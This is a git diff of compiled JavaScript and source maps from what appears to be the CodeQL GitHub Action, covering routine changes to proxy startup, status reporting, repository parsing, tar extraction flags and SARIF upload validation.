||||||
|
};
|
||||||
|
return function (mod) {
|
||||||
|
if (mod && mod.__esModule) return mod;
|
||||||
|
var result = {};
|
||||||
|
if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
|
||||||
|
__setModuleDefault(result, mod);
|
||||||
|
return result;
|
||||||
|
};
|
||||||
|
})();
|
||||||
|
var __importDefault = (this && this.__importDefault) || function (mod) {
|
||||||
|
return (mod && mod.__esModule) ? mod : { "default": mod };
|
||||||
|
};
|
||||||
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
const fs = __importStar(require("fs"));
|
||||||
|
const path = __importStar(require("path"));
|
||||||
|
const ava_1 = __importDefault(require("ava"));
|
||||||
|
const sinon = __importStar(require("sinon"));
|
||||||
|
const actionsUtil = __importStar(require("./actions-util"));
|
||||||
|
const gitUtils = __importStar(require("./git-utils"));
|
||||||
|
const logging_1 = require("./logging");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
|
const testing_utils_1 = require("./testing-utils");
|
||||||
|
const util_1 = require("./util");
|
||||||
|
(0, testing_utils_1.setupTests)(ava_1.default);
|
||||||
|
(0, ava_1.default)("writeOverlayChangesFile generates correct changes file", async (t) => {
|
||||||
|
await (0, util_1.withTmpDir)(async (tmpDir) => {
|
||||||
|
const dbLocation = path.join(tmpDir, "db");
|
||||||
|
await fs.promises.mkdir(dbLocation, { recursive: true });
|
||||||
|
const sourceRoot = path.join(tmpDir, "src");
|
||||||
|
await fs.promises.mkdir(sourceRoot, { recursive: true });
|
||||||
|
const tempDir = path.join(tmpDir, "temp");
|
||||||
|
await fs.promises.mkdir(tempDir, { recursive: true });
|
||||||
|
const logger = (0, logging_1.getRunnerLogger)(true);
|
||||||
|
const config = (0, testing_utils_1.createTestConfig)({ dbLocation });
|
||||||
|
// Mock the getFileOidsUnderPath function to return base OIDs
|
||||||
|
const baseOids = {
|
||||||
|
"unchanged.js": "aaa111",
|
||||||
|
"modified.js": "bbb222",
|
||||||
|
"deleted.js": "ccc333",
|
||||||
|
};
|
||||||
|
const getFileOidsStubForBase = sinon
|
||||||
|
.stub(gitUtils, "getFileOidsUnderPath")
|
||||||
|
.resolves(baseOids);
|
||||||
|
// Write the base database OIDs file
|
||||||
|
await (0, overlay_database_utils_1.writeBaseDatabaseOidsFile)(config, sourceRoot);
|
||||||
|
getFileOidsStubForBase.restore();
|
||||||
|
// Mock the getFileOidsUnderPath function to return overlay OIDs
|
||||||
|
const currentOids = {
|
||||||
|
"unchanged.js": "aaa111",
|
||||||
|
"modified.js": "ddd444", // Changed OID
|
||||||
|
"added.js": "eee555", // New file
|
||||||
|
};
|
||||||
|
const getFileOidsStubForOverlay = sinon
|
||||||
|
.stub(gitUtils, "getFileOidsUnderPath")
|
||||||
|
.resolves(currentOids);
|
||||||
|
// Write the overlay changes file, which uses the mocked overlay OIDs
|
||||||
|
// and the base database OIDs file
|
||||||
|
const getTempDirStub = sinon
|
||||||
|
.stub(actionsUtil, "getTemporaryDirectory")
|
||||||
|
.returns(tempDir);
|
||||||
|
const changesFilePath = await (0, overlay_database_utils_1.writeOverlayChangesFile)(config, sourceRoot, logger);
|
||||||
|
getFileOidsStubForOverlay.restore();
|
||||||
|
getTempDirStub.restore();
|
||||||
|
const fileContent = await fs.promises.readFile(changesFilePath, "utf-8");
|
||||||
|
const parsedContent = JSON.parse(fileContent);
|
||||||
|
t.deepEqual(parsedContent.changes.sort(), ["added.js", "deleted.js", "modified.js"], "Should identify added, deleted, and modified files");
|
||||||
|
});
|
||||||
|
});
|
||||||
|
//# sourceMappingURL=overlay-database-utils.test.js.map
|
||||||
1
lib/overlay-database-utils.test.js.map
Normal file
1
lib/overlay-database-utils.test.js.map
Normal file
@@ -0,0 +1 @@
|
|||||||
|
{"version":3,"file":"overlay-database-utils.test.js","sourceRoot":"","sources":["../src/overlay-database-utils.test.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA,uCAAyB;AACzB,2CAA6B;AAE7B,8CAAuB;AACvB,6CAA+B;AAE/B,4DAA8C;AAC9C,sDAAwC;AACxC,uCAA4C;AAC5C,qEAGkC;AAClC,mDAA+D;AAC/D,iCAAoC;AAEpC,IAAA,0BAAU,EAAC,aAAI,CAAC,CAAC;AAEjB,IAAA,aAAI,EAAC,wDAAwD,EAAE,KAAK,EAAE,CAAC,EAAE,EAAE;IACzE,MAAM,IAAA,iBAAU,EAAC,KAAK,EAAE,MAAM,EAAE,EAAE;QAChC,MAAM,UAAU,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,IAAI,CAAC,CAAC;QAC3C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QACzD,MAAM,UAAU,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,KAAK,CAAC,CAAC;QAC5C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QACzD,MAAM,OAAO,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;QAC1C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,OAAO,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QAEtD,MAAM,MAAM,GAAG,IAAA,yBAAe,EAAC,IAAI,CAAC,CAAC;QACrC,MAAM,MAAM,GAAG,IAAA,gCAAgB,EAAC,EAAE,UAAU,EAAE,CAAC,CAAC;QAEhD,6DAA6D;QAC7D,MAAM,QAAQ,GAAG;YACf,cAAc,EAAE,QAAQ;YACxB,aAAa,EAAE,QAAQ;YACvB,YAAY,EAAE,QAAQ;SACvB,CAAC;QACF,MAAM,sBAAsB,GAAG,KAAK;aACjC,IAAI,CAAC,QAAQ,EAAE,sBAAsB,CAAC;aACtC,QAAQ,CAAC,QAAQ,CAAC,CAAC;QAEtB,oCAAoC;QACpC,MAAM,IAAA,kDAAyB,EAAC,MAAM,EAAE,UAAU,CAAC,CAAC;QACpD,sBAAsB,CAAC,OAAO,EAAE,CAAC;QAEjC,gEAAgE;QAChE,MAAM,WAAW,GAAG;YAClB,cAAc,EAAE,QAAQ;YACxB,aAAa,EAAE,QAAQ,EAAE,cAAc;YACvC,UAAU,EAAE,QAAQ,EAAE,WAAW;SAClC,CAAC;QACF,MAAM,yBAAyB,GAAG,KAAK;aACpC,IAAI,CAAC,QAAQ,EAAE,sBAAsB,CAAC;aACtC,QAAQ,CAAC,WAAW,CAAC,CAAC;QAEzB,qEAAqE;QACrE,kCAAkC;QAClC,MAAM,cAAc,GAAG,KAAK;aACzB,IAAI,CAAC,WAAW,EAAE,uBAAuB,CAAC;aAC1C,OAAO,CAAC,OAAO,CAAC,CAAC;QACpB,MAAM,eAAe,GAAG,MAAM,IAAA,gDAAuB,EACnD,MAAM,EACN,UAAU,EACV,MAAM,CACP,CAAC;QACF,yBAAyB,CAAC,OAAO,EAAE,CAAC;QACpC,cAAc,CAAC,OAAO,EAAE,CAAC;QAEzB,MAAM,WAAW,GAAG,MAAM,EAAE,CAAC,QAAQ,CAAC,QAAQ,CAAC,eAAe,EAAE,OAAO,CAAC,CAAC;QACzE,MAAM,aAAa,GAAG,IAAI,CAAC,KAAK,CAAC,WAAW,CAA0B,CAAC;QAEvE,CAAC,CAAC,SAAS,CACT,aAAa,CAAC,OAAO,CAAC,IAAI,EAAE,EAC5B,CAAC,UAAU,EAAE,YAAY,EAAE,aAAa,CAAC,EACzC,oDAAoD,CACrD,CAAC;IACJ,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
|
||||||
26
lib/repository.js
generated
26
lib/repository.js
generated
@@ -1,7 +1,33 @@
|
|||||||
"use strict";
|
"use strict";
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.getRepositoryNwo = getRepositoryNwo;
|
||||||
|
exports.getRepositoryNwoFromEnv = getRepositoryNwoFromEnv;
|
||||||
exports.parseRepositoryNwo = parseRepositoryNwo;
|
exports.parseRepositoryNwo = parseRepositoryNwo;
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
|
/**
|
||||||
|
* Get the repository name with owner from the environment variable
|
||||||
|
* `GITHUB_REPOSITORY`.
|
||||||
|
*
|
||||||
|
* @returns The repository name with owner.
|
||||||
|
*/
|
||||||
|
function getRepositoryNwo() {
|
||||||
|
return getRepositoryNwoFromEnv("GITHUB_REPOSITORY");
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Get the repository name with owner from the first environment variable that
|
||||||
|
* is set and non-empty.
|
||||||
|
*
|
||||||
|
* @param envVarNames The names of the environment variables to check.
|
||||||
|
* @returns The repository name with owner.
|
||||||
|
* @throws ConfigurationError if none of the environment variables are set.
|
||||||
|
*/
|
||||||
|
function getRepositoryNwoFromEnv(...envVarNames) {
|
||||||
|
const envVarName = envVarNames.find((name) => process.env[name]);
|
||||||
|
if (!envVarName) {
|
||||||
|
throw new util_1.ConfigurationError(`None of the env vars ${envVarNames.join(", ")} are set`);
|
||||||
|
}
|
||||||
|
return parseRepositoryNwo((0, util_1.getRequiredEnvParam)(envVarName));
|
||||||
|
}
|
||||||
function parseRepositoryNwo(input) {
|
function parseRepositoryNwo(input) {
|
||||||
const parts = input.split("/");
|
const parts = input.split("/");
|
||||||
if (parts.length !== 2) {
|
if (parts.length !== 2) {
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"repository.js","sourceRoot":"","sources":["../src/repository.ts"],"names":[],"mappings":";;AAQA,gDASC;AAjBD,iCAA4C;AAQ5C,SAAgB,kBAAkB,CAAC,KAAa;IAC9C,MAAM,KAAK,GAAG,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;IAC/B,IAAI,KAAK,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;QACvB,MAAM,IAAI,yBAAkB,CAAC,IAAI,KAAK,kCAAkC,CAAC,CAAC;IAC5E,CAAC;IACD,OAAO;QACL,KAAK,EAAE,KAAK,CAAC,CAAC,CAAC;QACf,IAAI,EAAE,KAAK,CAAC,CAAC,CAAC;KACf,CAAC;AACJ,CAAC"}
|
{"version":3,"file":"repository.js","sourceRoot":"","sources":["../src/repository.ts"],"names":[],"mappings":";;AAcA,4CAEC;AAUD,0DAUC;AAED,gDASC;AA/CD,iCAAiE;AAQjE;;;;;GAKG;AACH,SAAgB,gBAAgB;IAC9B,OAAO,uBAAuB,CAAC,mBAAmB,CAAC,CAAC;AACtD,CAAC;AAED;;;;;;;GAOG;AACH,SAAgB,uBAAuB,CACrC,GAAG,WAAqB;IAExB,MAAM,UAAU,GAAG,WAAW,CAAC,IAAI,CAAC,CAAC,IAAI,EAAE,EAAE,CAAC,OAAO,CAAC,GAAG,CAAC,IAAI,CAAC,CAAC,CAAC;IACjE,IAAI,CAAC,UAAU,EAAE,CAAC;QAChB,MAAM,IAAI,yBAAkB,CAC1B,wBAAwB,WAAW,CAAC,IAAI,CAAC,IAAI,CAAC,UAAU,CACzD,CAAC;IACJ,CAAC;IACD,OAAO,kBAAkB,CAAC,IAAA,0BAAmB,EAAC,UAAU,CAAC,CAAC,CAAC;AAC7D,CAAC;AAED,SAAgB,kBAAkB,CAAC,KAAa;IAC9C,MAAM,KAAK,GAAG,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;IAC/B,IAAI,KAAK,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;QACvB,MAAM,IAAI,yBAAkB,CAAC,IAAI,KAAK,kCAAkC,CAAC,CAAC;IAC5E,CAAC;IACD,OAAO;QACL,KAAK,EAAE,KAAK,CAAC,CAAC,CAAC;QACf,IAAI,EAAE,KAAK,CAAC,CAAC,CAAC;KACf,CAAC;AACJ,CAAC"}
|
||||||
7
lib/start-proxy-action-post.js
generated
7
lib/start-proxy-action-post.js
generated
@@ -53,7 +53,12 @@ async function runWrapper() {
|
|||||||
// Kill the running proxy
|
// Kill the running proxy
|
||||||
const pid = core.getState("proxy-process-pid");
|
const pid = core.getState("proxy-process-pid");
|
||||||
if (pid) {
|
if (pid) {
|
||||||
process.kill(Number(pid));
|
try {
|
||||||
|
process.kill(Number(pid));
|
||||||
|
}
|
||||||
|
catch (error) {
|
||||||
|
logger.error(`Failed to kill proxy process: ${(0, util_1.getErrorMessage)(error)}`);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
const config = await configUtils.getConfig(actionsUtil.getTemporaryDirectory(), logger);
|
const config = await configUtils.getConfig(actionsUtil.getTemporaryDirectory(), logger);
|
||||||
if ((config && config.debugMode) || core.isDebug()) {
|
if ((config && config.debugMode) || core.isDebug()) {
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"start-proxy-action-post.js","sourceRoot":"","sources":["../src/start-proxy-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,4DAA8C;AAC9C,uDAA8D;AAC9D,uCAA6C;AAC7C,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAElC,IAAI,CAAC;QACH,4CAA4C;QAC5C,WAAW,CAAC,aAAa,EAAE,CAAC;QAE5B,yBAAyB;QACzB,MAAM,GAAG,GAAG,IAAI,CAAC,QAAQ,CAAC,mBAAmB,CAAC,CAAC;QAC/C,IAAI,GAAG,EAAE,CAAC;YACR,OAAO,CAAC,IAAI,CAAC,MAAM,CAAC,GAAG,CAAC,CAAC,CAAC;QAC5B,CAAC;QAED,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,SAAS,CACxC,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;QAEF,IAAI,CAAC,MAAM,IAAI,MAAM,CAAC,SAAS,CAAC,IAAI,IAAI,CAAC,OAAO,EAAE,EAAE,CAAC;YACnD,MAAM,WAAW,GAAG,IAAI,CAAC,QAAQ,CAAC,gBAAgB,CAAC,CAAC;YACpD,MAAM,CAAC,IAAI,CACT,wEAAwE,CACzE,CAAC;YACF,IAAI,MAAM,EAAE,aAAa,CAAC,IAAI,KAAK,SAAS,EAAE,CAAC;gBAC7C,MAAM,CAAC,OAAO,CACZ,qFAAqF,CACtF,CAAC;gBACF,OAAO;YACT,CAAC;YACD,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;YAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;YAEjD,MAAM,gBAAgB,GAAG,MAAM,IAAA,2CAAyB,EACtD,MAAM,EACN,aAAa,CAAC,IAAI,CACnB,CAAC;YAEF,MAAM,gBAAgB,CAAC,cAAc,CACnC,gBAAgB,EAChB,CAAC,WAAW,CAAC,EACb,WAAW,CAAC,qBAAqB,EAAE,EACnC;gBACE,wFAAwF;gBACxF,aAAa,EAAE,CAAC;aACjB,CACF,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,gEAAgE;QAChE,MAAM,CAAC,OAAO,CACZ,wCAAwC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CACjE,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
{"version":3,"file":"start-proxy-action-post.js","sourceRoot":"","sources":["../src/start-proxy-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,4DAA8C;AAC9C,uDAA8D;AAC9D,uCAA6C;AAC7C,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAElC,IAAI,CAAC;QACH,4CAA4C;QAC5C,WAAW,CAAC,aAAa,EAAE,CAAC;QAE5B,yBAAyB;QACzB,MAAM,GAAG,GAAG,IAAI,CAAC,QAAQ,CAAC,mBAAmB,CAAC,CAAC;QAC/C,IAAI,GAAG,EAAE,CAAC;YACR,IAAI,CAAC;gBACH,OAAO,CAAC,IAAI,CAAC,MAAM,CAAC,GAAG,CAAC,CAAC,CAAC;YAC5B,CAAC;YAAC,OAAO,KAAK,EAAE,CAAC;gBACf,MAAM,CAAC,KAAK,CAAC,iCAAiC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CAAC,CAAC;YAC1E,CAAC;QACH,CAAC;QAED,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,SAAS,CACxC,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;QAEF,IAAI,CAAC,MAAM,IAAI,MAAM,CAAC,SAAS,CAAC,IAAI,IAAI,CAAC,OAAO,EAAE,EAAE,CAAC;YACnD,MAAM,WAAW,GAAG,IAAI,CAAC,QAAQ,CAAC,gBAAgB,CAAC,CAAC;YACpD,MAAM,CAAC,IAAI,CACT,wEAAwE,CACzE,CAAC;YACF,IAAI,MAAM,EAAE,aAAa,CAAC,IAAI,KAAK,SAAS,EAAE,CAAC;gBAC7C,MAAM,CAAC,OAAO,CACZ,qFAAqF,CACtF,CAAC;gBACF,OAAO;YACT,CAAC;YACD,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;YAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;YAEjD,MAAM,gBAAgB,GAAG,MAAM,IAAA,2CAAyB,EACtD,MAAM,EACN,aAAa,CAAC,IAAI,CACnB,CAAC;YAEF,MAAM,gBAAgB,CAAC,cAAc,CACnC,gBAAgB,EAChB,CAAC,WAAW,CAAC,EACb,WAAW,CAAC,qBAAqB,EAAE,EACnC;gBACE,wFAAwF;gBACxF,aAAa,EAAE,CAAC;aACjB,CACF,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,gEAAgE;QAChE,MAAM,CAAC,OAAO,CACZ,wCAAwC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CACjE,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
||||||
7
lib/start-proxy-action.js
generated
7
lib/start-proxy-action.js
generated
@@ -43,8 +43,8 @@ const logging_1 = require("./logging");
|
|||||||
const start_proxy_1 = require("./start-proxy");
|
const start_proxy_1 = require("./start-proxy");
|
||||||
const util = __importStar(require("./util"));
|
const util = __importStar(require("./util"));
|
||||||
const UPDATEJOB_PROXY = "update-job-proxy";
|
const UPDATEJOB_PROXY = "update-job-proxy";
|
||||||
const UPDATEJOB_PROXY_VERSION = "v2.0.20241023203727";
|
const UPDATEJOB_PROXY_VERSION = "v2.0.20250424171100";
|
||||||
const UPDATEJOB_PROXY_URL_PREFIX = "https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.18.1/";
|
const UPDATEJOB_PROXY_URL_PREFIX = "https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.21.1/";
|
||||||
const KEY_SIZE = 2048;
|
const KEY_SIZE = 2048;
|
||||||
const KEY_EXPIRY_YEARS = 2;
|
const KEY_EXPIRY_YEARS = 2;
|
||||||
const CERT_SUBJECT = [
|
const CERT_SUBJECT = [
|
||||||
@@ -112,7 +112,8 @@ async function runWrapper() {
|
|||||||
ca,
|
ca,
|
||||||
};
|
};
|
||||||
// Start the Proxy
|
// Start the Proxy
|
||||||
const proxyBin = await getProxyBinaryPath();
|
const proxyBin = actionsUtil.getOptionalInput("proxy_binary") ??
|
||||||
|
(await getProxyBinaryPath());
|
||||||
await startProxy(proxyBin, proxyConfig, proxyLogFilePath, logger);
|
await startProxy(proxyBin, proxyConfig, proxyLogFilePath, logger);
|
||||||
}
|
}
|
||||||
async function startProxy(binPath, config, logFilePath, logger) {
|
async function startProxy(binPath, config, logFilePath, logger) {
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
15
lib/status-report.js
generated
15
lib/status-report.js
generated
@@ -35,6 +35,7 @@ var __importStar = (this && this.__importStar) || (function () {
|
|||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
exports.JobStatus = exports.ActionName = void 0;
|
exports.JobStatus = exports.ActionName = void 0;
|
||||||
exports.isFirstPartyAnalysis = isFirstPartyAnalysis;
|
exports.isFirstPartyAnalysis = isFirstPartyAnalysis;
|
||||||
|
exports.isThirdPartyAnalysis = isThirdPartyAnalysis;
|
||||||
exports.getActionsStatus = getActionsStatus;
|
exports.getActionsStatus = getActionsStatus;
|
||||||
exports.getJobStatusDisplayName = getJobStatusDisplayName;
|
exports.getJobStatusDisplayName = getJobStatusDisplayName;
|
||||||
exports.createStatusReportBase = createStatusReportBase;
|
exports.createStatusReportBase = createStatusReportBase;
|
||||||
@@ -46,6 +47,7 @@ const api_client_1 = require("./api-client");
|
|||||||
const doc_url_1 = require("./doc-url");
|
const doc_url_1 = require("./doc-url");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const git_utils_1 = require("./git-utils");
|
const git_utils_1 = require("./git-utils");
|
||||||
|
const repository_1 = require("./repository");
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
var ActionName;
|
var ActionName;
|
||||||
(function (ActionName) {
|
(function (ActionName) {
|
||||||
@@ -70,6 +72,12 @@ function isFirstPartyAnalysis(actionName) {
|
|||||||
}
|
}
|
||||||
return process.env[environment_1.EnvVar.INIT_ACTION_HAS_RUN] === "true";
|
return process.env[environment_1.EnvVar.INIT_ACTION_HAS_RUN] === "true";
|
||||||
}
|
}
|
||||||
|
/**
|
||||||
|
* @returns true if the analysis is considered to be third party.
|
||||||
|
*/
|
||||||
|
function isThirdPartyAnalysis(actionName) {
|
||||||
|
return !isFirstPartyAnalysis(actionName);
|
||||||
|
}
|
||||||
/** Overall status of the entire job. String values match the Hydro schema. */
|
/** Overall status of the entire job. String values match the Hydro schema. */
|
||||||
var JobStatus;
|
var JobStatus;
|
||||||
(function (JobStatus) {
|
(function (JobStatus) {
|
||||||
@@ -248,13 +256,12 @@ async function sendStatusReport(statusReport) {
|
|||||||
core.debug("In test mode. Status reports are not uploaded.");
|
core.debug("In test mode. Status reports are not uploaded.");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
const nwo = (0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY");
|
const nwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const [owner, repo] = nwo.split("/");
|
|
||||||
const client = (0, api_client_1.getApiClient)();
|
const client = (0, api_client_1.getApiClient)();
|
||||||
try {
|
try {
|
||||||
await client.request("PUT /repos/:owner/:repo/code-scanning/analysis/status", {
|
await client.request("PUT /repos/:owner/:repo/code-scanning/analysis/status", {
|
||||||
owner,
|
owner: nwo.owner,
|
||||||
repo,
|
repo: nwo.repo,
|
||||||
data: statusReportJSON,
|
data: statusReportJSON,
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
10
lib/status-report.test.js
generated
10
lib/status-report.test.js
generated
@@ -109,4 +109,14 @@ function setupEnvironmentAndStub(tmpDir) {
|
|||||||
t.is((await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.Analyze, "failure", new Date("May 19, 2023 05:19:00"), (0, testing_utils_1.createTestConfig)({}), { numAvailableBytes: 100, numTotalBytes: 500 }, (0, logging_1.getRunnerLogger)(false), "failure cause", "exception stack trace"))?.first_party_analysis, true);
|
t.is((await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.Analyze, "failure", new Date("May 19, 2023 05:19:00"), (0, testing_utils_1.createTestConfig)({}), { numAvailableBytes: 100, numTotalBytes: 500 }, (0, logging_1.getRunnerLogger)(false), "failure cause", "exception stack trace"))?.first_party_analysis, true);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
(0, ava_1.default)("getActionStatus handling correctly various types of errors", (t) => {
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(new Error("arbitrary error")), "failure", "We categorise an arbitrary error as a failure");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(new util_1.ConfigurationError("arbitrary error")), "user-error", "We categorise a ConfigurationError as a user error");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(new Error("exit code 1"), "multiple things went wrong"), "failure", "getActionsStatus should return failure if passed an arbitrary error and an additional failure cause");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(new util_1.ConfigurationError("exit code 1"), "multiple things went wrong"), "user-error", "getActionsStatus should return user-error if passed a configuration error and an additional failure cause");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(), "success", "getActionsStatus should return success if no error is passed");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(new Object()), "failure", "getActionsStatus should return failure if passed an arbitrary object");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)(null, "an error occurred"), "failure", "getActionsStatus should return failure if passed null and an additional failure cause");
|
||||||
|
t.is((0, status_report_1.getActionsStatus)((0, util_1.wrapError)(new util_1.ConfigurationError("arbitrary error"))), "user-error", "We still recognise a wrapped ConfigurationError as a user error");
|
||||||
|
});
|
||||||
//# sourceMappingURL=status-report.test.js.map
|
//# sourceMappingURL=status-report.test.js.map
|
||||||
File diff suppressed because one or more lines are too long
11
lib/tar.js
generated
11
lib/tar.js
generated
@@ -143,7 +143,16 @@ async function extractTarZst(tar, dest, tarVersion, logger) {
|
|||||||
: ""}`);
|
: ""}`);
|
||||||
try {
|
try {
|
||||||
// Initialize args
|
// Initialize args
|
||||||
const args = ["-x", "--zstd"];
|
//
|
||||||
|
// `--ignore-zeros` means that trailing zero bytes at the end of an archive will be read
|
||||||
|
// by `tar` in case a further concatenated archive follows. Otherwise when a tarball built
|
||||||
|
// by GNU tar, which writes many trailing zeroes, is read by BSD tar, which expects less, then
|
||||||
|
// BSD tar can hang up the pipe to its filter program early, and if that program is `zstd`
|
||||||
|
// then it will try to write the remaining zeroes, get an EPIPE error because `tar` has closed
|
||||||
|
// its end of the pipe, return 1, and `tar` will pass the error along.
|
||||||
|
//
|
||||||
|
// See also https://github.com/facebook/zstd/issues/4294
|
||||||
|
const args = ["-x", "--zstd", "--ignore-zeros"];
|
||||||
if (tarVersion.type === "gnu") {
|
if (tarVersion.type === "gnu") {
|
||||||
// Suppress warnings when using GNU tar to extract archives created by BSD tar
|
// Suppress warnings when using GNU tar to extract archives created by BSD tar
|
||||||
args.push("--warning=no-unknown-keyword");
|
args.push("--warning=no-unknown-keyword");
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
66
lib/upload-lib.js
generated
66
lib/upload-lib.js
generated
@@ -44,6 +44,8 @@ exports.validateSarifFileSchema = validateSarifFileSchema;
|
|||||||
exports.buildPayload = buildPayload;
|
exports.buildPayload = buildPayload;
|
||||||
exports.uploadFiles = uploadFiles;
|
exports.uploadFiles = uploadFiles;
|
||||||
exports.waitForProcessing = waitForProcessing;
|
exports.waitForProcessing = waitForProcessing;
|
||||||
|
exports.shouldConsiderConfigurationError = shouldConsiderConfigurationError;
|
||||||
|
exports.shouldConsiderInvalidRequest = shouldConsiderInvalidRequest;
|
||||||
exports.validateUniqueCategory = validateUniqueCategory;
|
exports.validateUniqueCategory = validateUniqueCategory;
|
||||||
const fs = __importStar(require("fs"));
|
const fs = __importStar(require("fs"));
|
||||||
const path = __importStar(require("path"));
|
const path = __importStar(require("path"));
|
||||||
@@ -58,6 +60,7 @@ const api = __importStar(require("./api-client"));
|
|||||||
const api_client_1 = require("./api-client");
|
const api_client_1 = require("./api-client");
|
||||||
const codeql_1 = require("./codeql");
|
const codeql_1 = require("./codeql");
|
||||||
const config_utils_1 = require("./config-utils");
|
const config_utils_1 = require("./config-utils");
|
||||||
|
const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const fingerprints = __importStar(require("./fingerprints"));
|
const fingerprints = __importStar(require("./fingerprints"));
|
||||||
const gitUtils = __importStar(require("./git-utils"));
|
const gitUtils = __importStar(require("./git-utils"));
|
||||||
@@ -407,11 +410,20 @@ async function uploadFiles(sarifPath, checkoutPath, category, features, logger)
|
|||||||
logger.startGroup("Uploading results");
|
logger.startGroup("Uploading results");
|
||||||
logger.info(`Processing sarif files: ${JSON.stringify(sarifFiles)}`);
|
logger.info(`Processing sarif files: ${JSON.stringify(sarifFiles)}`);
|
||||||
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
||||||
// Validate that the files we were asked to upload are all valid SARIF files
|
try {
|
||||||
for (const file of sarifFiles) {
|
// Validate that the files we were asked to upload are all valid SARIF files
|
||||||
validateSarifFileSchema(file, logger);
|
for (const file of sarifFiles) {
|
||||||
|
validateSarifFileSchema(file, logger);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
catch (e) {
|
||||||
|
if (e instanceof SyntaxError) {
|
||||||
|
throw new InvalidSarifUploadError(e.message);
|
||||||
|
}
|
||||||
|
throw e;
|
||||||
}
|
}
|
||||||
let sarif = await combineSarifFilesUsingCLI(sarifFiles, gitHubVersion, features, logger);
|
